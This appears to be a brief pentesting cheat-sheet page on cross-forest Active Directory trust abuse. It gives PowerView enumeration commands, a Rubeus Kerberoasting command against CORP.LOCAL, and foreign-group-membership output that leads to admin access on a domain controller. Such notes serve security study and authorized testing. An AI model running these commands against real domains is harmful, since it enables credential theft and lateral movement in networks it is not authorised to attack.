Cross-Forest Trust Abuse
From Windows
Cross-Forest Kerberoasting
Enumerating Accounts for Associated SPNs Using Get-DomainUser
Import-Module .\PowerView.ps1
Get-DomainUser -SPN -Domain CORP.LOCAL | select SamAccountNamePerforming a Kerberoasting Attacking with Rubeus Using /domain Flag
.\Rubeus.exe kerberoast /domain:CORP.LOCAL /user:mssqlsvc /nowrapAdmin Password Re-Use & Group Membership
Using Get-DomainForeignGroupMember
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainForeignGroupMember -Domain CORP.LOCAL
GroupDomain : CORP.LOCAL
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=CORP,DC=LOCAL
MemberDomain : CORP.LOCAL
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=CORP,DC=LOCAL
PS C:\> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500
CORPORATE\administratorAccessing DC03 Using Enter-PSSession
from Linux
Cross-Forest Kerberoasting
Última actualización
¿Te fue útil?